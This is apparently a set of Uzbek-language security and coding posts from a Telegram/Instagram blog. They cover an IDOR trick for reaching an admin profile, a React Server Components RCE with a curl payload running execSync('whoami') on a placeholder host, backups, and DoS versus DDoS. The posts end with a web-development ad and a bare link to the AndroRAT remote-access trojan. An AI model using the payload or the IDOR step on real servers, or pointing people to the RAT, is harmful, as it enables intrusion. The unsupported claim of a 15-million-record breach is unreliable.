https://www.instagram.com/reel/DVJdvKvCI0G

Qanday ishladi?
Ro'yxatdan o'tganingizda URL manzilda ?id=101 kabi o'zingizning raqamingiz chiqdi. Siz raqamni shunchaki 1 ga o'zgartirdingiz va to'g'ridan-to'g'ri Admin profiliga kirib bordingiz.

Xato qayerda?
Sayt ma'lumot chiqarishdan oldin foydalanuvchini umuman tekshirmagan. Ya'ni, "Bu ma'lumotni so'rayotgan odam rostdan ham shu profil egasimi?" degan mantiqiy tekshiruv kodda yo'q edi. Server shunchaki ko'r-ko'rona ishonib, adminning sirini hammaga ochib berdi.

Yaqinda React va Next.js ekotizimida juda xavfli zaiflik aniqlangan. Bu zaiflik React Server Components (RSC) ishlatiladigan serverlarda masofadan turib buyruq bajarishga (Remote Code Execution) imkon beradi.
Muammo RSC “Flight protocol” maʼlumotlarini notoʻgʻri qayta ishlash bilan bogʻliq. Maxsus tayyorlangan payload orqali hujumchi server tomonda Node.js modullarini chaqirishi va OS buyruqlarini bajarishi mumkin. Shuningdek 15million aholi malumotlari aynan shu zaiflik asosida olingan

@uzcodingblog

npm install -g wappalyzer
wappalyzer https://example.com

curl -s -X POST http://example.com:4000/api/rsc/render \
-H "Content-Type: application/json" \
-d '{"flight":"0:require(\"child_process\").execSync(\"whoami\").toString()"}'  

@uzcodingblog

Dasturchi sifatida eng katta xatolardan biri — ma’lumotlarga haddan tashqari ishonib qo‘yish. Hammasi joyida ishlayotgandek tuyuladi, lekin bitta xatolik, serverdagi nosozlik yoki oddiygina noto‘g‘ri o‘chirish butun loyihani yo‘qqa chiqarishi mumkin. Backup aynan shunday vaziyatlar uchun kerak. Bu — ma’lumotlarning zaxira nusxasi bo‘lib, kerak bo‘lganda tizimni oldingi holatiga qaytarish imkonini beradi. Ayniqsa production tizimlarda backup yo‘qligi katta xavf hisoblanadi. Ko‘pincha muammo yuz bergandan keyin backup haqida o‘ylay boshlashadi. Aslida esa bu oldindan yo‘lga qo‘yilishi kerak bo‘lgan jarayon. Oddiy qilib aytganda, backup — bu sizning “plan B”ingiz. Yaxshi yondashuv esa juda murakkab emas: muntazam backup olish, uni bir nechta joyda saqlash va vaqti-vaqti bilan tiklab ko‘rish. Shunda siz kutilmagan holatlarda ham xotirjam ishlay olasiz

Backup qilinmagan loyiha — bu har doim xavf ostidagi loyiha.

🌙Ramazon Hayiti muborak bo‘lsin!

DoS (Denial of Service) — bu bitta manbadan amalga oshiriladigan hujum. Oddiy qilib aytganda, bitta qurilma serverga juda ko‘p so‘rov yuboradi va uni ortiqcha yuklab qo‘yadi. Natijada server javob bera olmay qoladi yoki butunlay ishlamaydi. Bunday hujumni aniqlash va bloklash nisbatan oson — odatda bitta IP manzilni yopish yetarli bo‘ladi.

DDoS (Distributed Denial of Service) esa ancha murakkab. Bu yerda hujum bitta emas, balki minglab yoki hatto millionlab qurilmalardan bir vaqtda amalga oshiriladi. Ko‘pincha bu qurilmalar botnet bo‘ladi, ya’ni oldindan zararlangan kompyuterlar yoki IoT qurilmalar. Har biri alohida so‘rov yuboradi, lekin umumiy bosim serverni yiqitadi.

Asosiy farq — DoS bitta nuqtadan keladi, DDoS esa tarqatilgan. Shu sababli DDoS’ni aniqlash ham, himoyalanish ham ancha qiyin. IP bloklash bu yerda deyarli foyda bermaydi.

@uzcodingblog

🌐 Web-saytlar – tezkor, zamonaviy, mobil qurilmalarga mos va brendingizga mos dizayn bilan.

🤖 Telegram botlar – buyurtma, to‘lov, mijozlar bilan aloqa kabi jarayonlarni avtomatlashtirish imkoniyati.

✅Biznesingiz raqamli maydonga chiqadi

🔎Mijozlar bilan aloqa yengillashadi

🖥Ish jarayonlari optimallashtiriladi

👤Imidjingiz va ishonchingiz ortadi

📈Sotuvlar va daromad o‘sadi

👨‍💼 Har bir loyiha individual yondashuv bilan ishlab chiqiladi — sizning maqsadingiz biz uchun ustuvor!

🚀 Zamonaviy texnologiyalar – sizning rivojlanishingiz uchun xizmat qiladi

https://github.com/karma9874/AndroRAT.git